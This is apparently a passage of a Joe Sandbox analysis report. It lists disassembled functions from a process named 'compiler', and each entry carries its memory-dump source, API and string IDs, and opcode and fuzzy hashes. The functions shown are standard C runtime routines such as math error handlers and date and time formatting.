                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 671b90c839151866aa1ebddab602b54d62c9f0c33ebb5256414d4f66f1be25a7
                                                            • Instruction ID: 5c2673a79377cdfd4f51db9e3dee5ed3030eccf3a944334104b68105bb69a5f6
                                                            • Opcode Fuzzy Hash: 671b90c839151866aa1ebddab602b54d62c9f0c33ebb5256414d4f66f1be25a7
                                                            • Instruction Fuzzy Hash: 3D71C5B695921286F768BF3D805447CB7A4FB26B18F9501B9DF4E0229ECF38E441C724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD94E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: d635b599068aacbad0d6f1b01662b04a2818e42135e6a8fdc667eed9cb431b05
                                                            • Instruction ID: 47e326640dbbc949c27753c1dfe1cf005abf20b43adb35da970f12950101d7af
                                                            • Opcode Fuzzy Hash: d635b599068aacbad0d6f1b01662b04a2818e42135e6a8fdc667eed9cb431b05
                                                            • Instruction Fuzzy Hash: 5F71A6B290861286F764BF2C804847CB7B0FB66B58F9411B6DF4E4229DDF39D485C7A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD94668 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 54eece3e8767ad00d432cbf52d6f3945dcf2b3d349de7b59a167cc0f1cf879f6
                                                            • Instruction ID: 6c420d202330b66e595a444725b65bd9b49e5ff8c47f3bd41ce9f2fadd8e352d
                                                            • Opcode Fuzzy Hash: 54eece3e8767ad00d432cbf52d6f3945dcf2b3d349de7b59a167cc0f1cf879f6
                                                            • Instruction Fuzzy Hash: 4971B4F290825286F764BF2C80545BCB7A0EB27B58FD44175CF194329EDF28D841D761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD563B4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB16A0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADB16CE
                                                            • fwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BAD56499
                                                              • Part of subcall function 00007FF7BADA9C78: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADA9C8C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$fwprintf
                                                            • String ID: %lf$too many arguments
                                                            • API String ID: 1510895727-3990051606
                                                            • Opcode ID: 9f15843d22a8e06c5bb73af29518dd4b88a46f6b57799560715c4884a15d187c
                                                            • Instruction ID: de37e645cf9b3696f7a8668f35b05ced0158fcc967e4028698ccea63efac24c6
                                                            • Opcode Fuzzy Hash: 9f15843d22a8e06c5bb73af29518dd4b88a46f6b57799560715c4884a15d187c
                                                            • Instruction Fuzzy Hash: 6541D321E2868641FE60BA2A9410179E791EB66BA4F984371DF6D176CDDE3CE4428320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADAF850 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$fmod
                                                            • API String ID: 1757819995-3213614193
                                                            • Opcode ID: ef00379805b805cfb507051ffc9d313dbc9658f9502882dce6befe6a57f3b8e7
                                                            • Instruction ID: 82830981dfaf048d623cdad92ae3f307c91e49b548b8fe665315f3882c2a1082
                                                            • Opcode Fuzzy Hash: ef00379805b805cfb507051ffc9d313dbc9658f9502882dce6befe6a57f3b8e7
                                                            • Instruction Fuzzy Hash: 9C518012D29A8145F2237B39E0157B5EA68EFB73C4F8093B2EF4E216BDDB1DA1064210
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBB118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: afecaafd94b44fbe7b062941ff27cc9667c0b6e10fc8e87fafbfea2ba7f69c76
                                                            • Instruction ID: 33083f7501bf27812511495999af59420eaf51fecd7f5dbbe2aa343553c28ee9
                                                            • Opcode Fuzzy Hash: afecaafd94b44fbe7b062941ff27cc9667c0b6e10fc8e87fafbfea2ba7f69c76
                                                            • Instruction Fuzzy Hash: 5241A022A18B4595EB20AF29E8443A9A6A1FBA9794FC04135EF4D8779CEF3CD441C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD97708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: (null)
                                                            • API String ID: 3215553584-3941151225
                                                            • Opcode ID: ea62b2bd4347bb6786d3e16f4766b81d968c4a952ee6dd964228d8c49b4ba34d
                                                            • Instruction ID: 3023810cff38094b32fb9f635c8ad2896c760a56efdeff20ade1d84c73e37d66
                                                            • Opcode Fuzzy Hash: ea62b2bd4347bb6786d3e16f4766b81d968c4a952ee6dd964228d8c49b4ba34d
                                                            • Instruction Fuzzy Hash: 9A418D7290864286FB55BF2CC1446BCA7A1EB22B88FD441B9CF4D0739DDF2AE452D721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD978E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: (null)
                                                            • API String ID: 3215553584-3941151225
                                                            • Opcode ID: 102621c1cf72ef40b396114c65d8f98b51c492e9cce668a00d6a57e2478b1f53
                                                            • Instruction ID: 809aa07b9fcfbda85f590a001c6e40b14d4e1b4e96f25b97fdafcce0620ab7d3
                                                            • Opcode Fuzzy Hash: 102621c1cf72ef40b396114c65d8f98b51c492e9cce668a00d6a57e2478b1f53
                                                            • Instruction Fuzzy Hash: E73148729086419AFB50BF19C1406BCA7A0EB66B88FD441B6CF8C0739DDF3AD952D724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD583C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamestrrchrstrstr
                                                            • String ID: unable to get ModuleFileName
                                                            • API String ID: 3144931378-205594539
                                                            • Opcode ID: b5f2cbc36472fc4cb0e3656276ea9e80133555ced7d139e9c526c1705f77e15b
                                                            • Instruction ID: ac0b0540651e7bd346ad8a6e8fd222cac069cad687e2522703eef496c675b0cd
                                                            • Opcode Fuzzy Hash: b5f2cbc36472fc4cb0e3656276ea9e80133555ced7d139e9c526c1705f77e15b
                                                            • Instruction Fuzzy Hash: 92217310F0864640FE20BB6A68113F99291EFA7BD0FC452B6EE5E073DDCE3CE5048660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD787C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s at line %d
                                                            • API String ID: 2941638530-3439818798
                                                            • Opcode ID: d6f2888908a2dd680c163834b24145f1a6008817dd3e21db85efc3e19e7cd15d
                                                            • Instruction ID: 5be6b372a37da8a8bad3ee61298f06e304f8980a0b4bf91b69471237478aa16f
                                                            • Opcode Fuzzy Hash: d6f2888908a2dd680c163834b24145f1a6008817dd3e21db85efc3e19e7cd15d
                                                            • Instruction Fuzzy Hash: 8F21CF61B0828645FA68BB6AA5516BDD361DF77BC0F849071EF4D0BF5ECE2CE0858720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBD450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            • Opcode ID: 7b30ecc590982bc226c08bb59d92b5c56cfb97ac15fdf649d71c3776f9db4a5a
                                                            • Instruction ID: a11abd5823e7cbe3cf7062c52d70d4c7e7fa4736b3422ce10fc57f4496b296bd
                                                            • Opcode Fuzzy Hash: 7b30ecc590982bc226c08bb59d92b5c56cfb97ac15fdf649d71c3776f9db4a5a
                                                            • Instruction Fuzzy Hash: 20211A72D18B8597E370EF14E44066AAAA0FBEB348FA01325FBC90695CDBBDD1459B10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3EA64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s:%d: %s
                                                            • API String ID: 2941638530-3176420449
                                                            • Opcode ID: b49ad301e1308b64ffaed0ca03139643b9807cdf7d37a9ac50b3c55cac9770dc
                                                            • Instruction ID: 8975dae9d03d1fec7c580df53016ea4d482dea000ecd9943730d10b8f03b87a8
                                                            • Opcode Fuzzy Hash: b49ad301e1308b64ffaed0ca03139643b9807cdf7d37a9ac50b3c55cac9770dc
                                                            • Instruction Fuzzy Hash: 4011D862F0865541FB10BB2DD8402A893D0EF6ABE0F945275DF5D473DDDD2CD5468720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBE900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_errno_from_matherr
                                                            • String ID: tanh
                                                            • API String ID: 1187470696-874243715
                                                            • Opcode ID: 7d2a86f6479949b20b33a8532a791871a298c6eea2214d69dd7ef9dca356721e
                                                            • Instruction ID: 8ab715bed7998ac193d7877de744099b2cbbbd190b436fd3f1c57c4dfffed03b
                                                            • Opcode Fuzzy Hash: 7d2a86f6479949b20b33a8532a791871a298c6eea2214d69dd7ef9dca356721e
                                                            • Instruction Fuzzy Hash: 0421FF76A197459BEB60FF28A44026AB2B0FB99700F905579FB8D8375EDE3CD4448F10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB79F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CompareStringtry_get_function
                                                            • String ID: CompareStringEx
                                                            • API String ID: 3328479835-2590796910
                                                            • Opcode ID: f6ed536225230fea3da8ba20fc9ba8ab58a260ed9f37b883d5d7c59dbefcbe8d
                                                            • Instruction ID: bf286ab7506396f2599771a42006c950f4d8aea293fdef0ecb8e76ae4f148b6a
                                                            • Opcode Fuzzy Hash: f6ed536225230fea3da8ba20fc9ba8ab58a260ed9f37b883d5d7c59dbefcbe8d
                                                            • Instruction Fuzzy Hash: B3112C36608B8086E760EB09B4402AAF7A0F799B80F984135EFCD43B1DDF3CD5508B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7C98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DateFormattry_get_function
                                                            • String ID: GetDateFormatEx
                                                            • API String ID: 595753042-159735388
                                                            • Opcode ID: 34a8d95a73a27ed6ac5aa0aef5f011841f0b742d4f45189685d2443132902981
                                                            • Instruction ID: e661a4cb1cec711aecbd78736cbc1e449305865ea15779ffe77111594b5c58aa
                                                            • Opcode Fuzzy Hash: 34a8d95a73a27ed6ac5aa0aef5f011841f0b742d4f45189685d2443132902981
                                                            • Instruction Fuzzy Hash: 1D115171A09B8186E610EB59B4401AAF7A0FB99BD0F984175FF8D43B6DCE3CD5508B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7E1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FormatTimetry_get_function
                                                            • String ID: GetTimeFormatEx
                                                            • API String ID: 3261793192-1692793031
                                                            • Opcode ID: 9572ec2cfb2d0fff19f141f608b61a55d30443e68d939441d7b2005ed089d0ad
                                                            • Instruction ID: 11f4857bad03b1ffbdb8ca23e0c017f914ecdbb7391d5a245a1dafa1e16daf1f
                                                            • Opcode Fuzzy Hash: 9572ec2cfb2d0fff19f141f608b61a55d30443e68d939441d7b2005ed089d0ad
                                                            • Instruction Fuzzy Hash: C3118C71A09B8186F610EB1AA4400AAF7A0FB99BC0F984176FF8D43B6DCE3CD5518B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3C82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s:%d: %s
                                                            • API String ID: 2941638530-3176420449
                                                            • Opcode ID: b5aa331dfc1da5f80685daa531f65a8795fdd259dc0391fe76681e6c0d620240
                                                            • Instruction ID: 39cff0b1ae38575a25096c6ff464a786d68fbfdd3c05bed6c96e6315798d9d30
                                                            • Opcode Fuzzy Hash: b5aa331dfc1da5f80685daa531f65a8795fdd259dc0391fe76681e6c0d620240
                                                            • Instruction Fuzzy Hash: C201A255F0969148FA64BB0A9840BE5A710EFBBBC0F889071EF4D1BB4ECD2CD4088710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBDCAB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$cos
                                                            • API String ID: 1757819995-1949035351
                                                            • Opcode ID: b0e761f792873da9f84ec97e1104178f4636fe0dc204ba03d8786ff8f5a6878c
                                                            • Instruction ID: a019eefbf2e8647bc4c888203b1af29e44179821370e0f67cc3250933db6d80e
                                                            • Opcode Fuzzy Hash: b0e761f792873da9f84ec97e1104178f4636fe0dc204ba03d8786ff8f5a6878c
                                                            • Instruction Fuzzy Hash: 3001A572A18BC542EA14EF25940036AA161FBAABD4FD04375FA9907BDDDF6CD1415700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBDCCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
